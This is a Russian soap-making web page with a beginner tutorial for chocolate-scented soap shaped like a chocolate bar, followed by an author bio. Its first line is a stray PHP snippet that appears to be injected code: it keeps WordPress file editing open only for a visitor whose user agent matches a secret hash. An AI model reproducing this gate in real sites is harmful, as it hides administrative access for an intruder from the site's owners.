if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс для новичков: готовим мыло в форме плитки шоколада. Ням-ням! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс для новичков: готовим мыло в форме плитки шоколада. Ням-ням!

Простое в изготовлении мыло с умопомрачительным запахом шоколада! Главное, потом не перепутать и случайно не съесть его :)

Пона­до­бят­ся:

  • Мыль­ная осно­ва (про­зрач­ная);
  • Кос­ме­ти­че­ские мас­ла (пер­си­ко­вое, мин­даль­ное, мас­ло вино­град­ной косточки);
  • Шоко­лад и какао-порошок;
  • Аро­ма­ти­за­тор «Шоко­лад»;
  • Спирт, фор­ма, пла­сти­ко­вый стаканчик.
    шоколад1
  1. Рас­то­пить мыль­ную осно­ву. Всы­пать какао-поро­шок и натер­тый на мел­кой тер­ке шоко­лад (в зави­си­мо­сти от жела­е­мой интен­сив­но­сти про­пор­ции мож­но варьи­ро­вать), пер­си­ко­вое мас­ло и аро­ма­ти­за­тор, перемешать.
  2. Залить в пред­ва­ри­тель­но сма­зан­ную олив­ко­вым мас­лом фор­му, сбрыз­нуть спир­том. Дать застыть (мож­но в холодильнике).

Если мыло гото­вит­ся для детей, аро­ма­ти­за­тор мож­но не добав­лять – есте­ствен­но­го запа­ха шоко­ла­да будет достаточно.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!